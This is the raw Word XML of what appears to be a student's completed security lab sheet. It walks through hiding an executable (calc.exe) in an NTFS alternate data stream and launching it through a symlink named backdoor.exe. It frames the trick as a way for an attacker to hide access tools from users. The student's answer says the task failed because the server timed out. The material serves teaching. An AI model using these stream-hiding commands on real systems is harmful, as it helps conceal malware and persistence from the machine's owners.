                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:t>any</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-20"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:t>executables,</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-20"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:t>use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t>any</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-20"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:t>development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t>platform.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t>(.Net,</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-19"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:t>Java, Python Scripts…)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3E1650A1" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:spacing w:before="7"/>
                        <w:rPr>
                          <w:sz w:val="23"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="79201590" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both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</w:rPr>
                        <w:t>Try</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"/>
                          <w:spacing w:val="-1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24"/>
                        </w:rPr>
                        <w:t>them</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>and</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>record</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>them</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>in</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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pacing w:val="-3"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>your</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>coursework</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>and/or</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"/>
                          <w:spacing w:val="-1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24"/>
                        </w:rPr>
                        <w:t>in</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>the</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>shared</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>Onenote</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"/>
                          <w:spacing w:val="-1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24"/>
                        </w:rPr>
                        <w:t>with instructions to gain</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF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24"/>
                        </w:rPr>
                        <w:t>CREDITS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280B8F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Copy any exe application files (eg: calc.exe) file from your windows system files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C897E5" w14:textId="7371295C" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487613952" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67AB97E6" wp14:editId="1FF775DC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>73025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5486400" cy="1409065"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="33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0" cy="140906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ED9D86" w14:textId="49191A5A" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:spacing w:before="4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Record your EVIDENCE</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6314D1AC" w14:textId="30BCB1AA" w:rsidR="00246F7D" w:rsidRDefault="00246F7D">
                            <w:pPr>
                              <w:spacing w:before="4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1F89C1A" wp14:editId="49896703">
                                  <wp:extent cx="3301782" cy="1009816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77785" cy="103306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AB97E6" id="Text Box 11" o:spid="_x0000_s1043" type="#_x0000_t202" style="position:absolute;margin-left:1in;margin-top:5.75pt;width:6in;height:110.95pt;z-index:-157025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" fillcolor="#f2f2f2" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="48ED9D86" w14:textId="49191A5A" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:spacing w:before="4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Record your EVIDENCE</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6314D1AC" w14:textId="30BCB1AA" w:rsidR="00246F7D" w:rsidRDefault="00246F7D">
                      <w:pPr>
                        <w:spacing w:before="4"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="2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1F89C1A" wp14:editId="49896703">
                            <wp:extent cx="3301782" cy="1009816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377785" cy="103306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B781B89" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C52D9D" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C73A784" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Open the command prompt and set your created folder path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(C:\Fdr_Hide).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEE57BB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:right="1436"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Create a txt file (Either using the command promp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>t or go to the folder to create one) and add few lines of text and save the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A88689" w14:textId="67569E91" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560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4976" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41C88ADC" wp14:editId="71D72FED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>324485</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5486400" cy="619125"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="3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0" cy="61912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8AB86E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:spacing w:before="4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Record your EVIDENCE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C88ADC" id="Text Box 9" o:spid="_x0000_s1044" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:1in;margin-top:25.55pt;width:6in;height:48.75pt;z-index:-157015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" fillcolor="#f2f2f2" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0D8AB86E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:spacing w:before="4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Record your EVIDENCE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280B8F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Check the size of all the files in the Fdr_Hide</w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193E1B4D" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="103"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Now, hide the exe file into the txt file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA112A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Type c:\Fdr_Hide\calc.exe &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>c:\Fdr_Hide\txtfilename.txt:calc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D61814D" w14:textId="67909B02" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="99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5488" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4583ED78" wp14:editId="308B3582">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1828800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>311150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4572000" cy="617220"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="3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61722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62BAA1" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:spacing w:before="4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Is there any difference in the file size?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83ED78" id="Text Box 8" o:spid="_x0000_s1045" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:2in;margin-top:24.5pt;width:5in;height:48.6pt;z-index:-157009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" fillcolor="#f2f2f2" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1E62BAA1" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:spacing w:before="4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Is there any difference in the file size?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280B8F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Now check the file</w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sizes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AA495C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="103"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>mklink backdoor.exe txtfilename.txt:calc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCCEE7E" w14:textId="5EF5CCEC" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="99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56800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7139DC5F" wp14:editId="38FD0D58">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>501015</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="30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662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AA2C1C" id="Line 7" o:spid="_x0000_s1026" style="position:absolute;z-index:15756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4.65pt,39.45pt" to="595.3pt,3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">
                <w10:wrap anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E627BA" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="008B5358">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8EC247" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C00CBA" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB4FF3B" w14:textId="1E2FC554" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="84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53C8292A" wp14:editId="461E9465">
                <wp:extent cx="5486400" cy="1056640"/>
                <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                <wp:docPr id="29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0" cy="10566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24E19D" w14:textId="5D4F823A" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman"/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Record your </w:t>
                            </w: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Reflection (What happens wi</w:t>
                            </w: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th the backdoor.exe)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4E43CB34" w14:textId="565F630D" w:rsidR="00246F7D" w:rsidRDefault="00246F7D">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman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Could</w:t>
                            </w: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’</w:t>
                            </w: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nt do the task</w:t>
                            </w:r>
                            <w:r w:rsidR="006E4E04">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman"/>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> because windows server kept failing and timing out.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3C8292A" id="Text Box 6" o:spid="_x0000_s1046" type="#_x0000_t202" style="width:6in;height:83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" fillcolor="#f2f2f2" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7424E19D" w14:textId="5D4F823A" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman"/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Record your </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman"/>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Reflection (What happens wi</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman"/>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>th the backdoor.exe)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4E43CB34" w14:textId="565F630D" w:rsidR="00246F7D" w:rsidRDefault="00246F7D">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman"/>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman"/>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Could</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman"/>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>’</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman"/>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>nt do the task</w:t>
                      </w:r>
                      <w:r w:rsidR="006E4E04">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman"/>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> because windows server kept failing and timing out.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6B0551A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BD71AE" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBEF2A2" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="92"/>
        <w:ind w:left="840"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Two Dimensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6F0333" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDA86E9" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="1435"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>As an attacker, in your previous labs, you have created bat/ exe files which you used to gain and maintain access. Those files could be hidden using NTFS streams (like this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>method),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14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users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>see</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>So,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>execute them remotely whenever you need</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367641C8" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="34"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C664C7" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:ind w:left="840" w:right="1436"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>personal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>(doing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
